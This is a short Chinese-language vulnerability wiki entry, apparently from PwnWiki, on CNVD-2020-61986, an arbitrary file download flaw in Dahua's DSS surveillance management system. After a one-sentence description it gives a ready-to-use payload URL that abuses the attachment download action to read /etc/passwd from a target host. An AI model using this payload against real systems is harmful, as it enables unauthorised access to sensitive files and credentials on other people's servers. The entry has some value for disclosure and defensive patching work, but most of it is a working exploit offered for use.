Loading
0

CNVD-2020-61986 大华DSS系统任意文件下载漏洞

免费、自由、人人可编辑的漏洞库--pwnwiki.com

,

漏洞简介

浙江大华技术股份有限公司DSS存在任意文件下载漏洞,攻击者可利用该漏洞登录界面下载任意文件获取敏感信息。

Payload

http://ip/itc/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd

免费、自由、人人可编辑的漏洞库--PwnWiki.com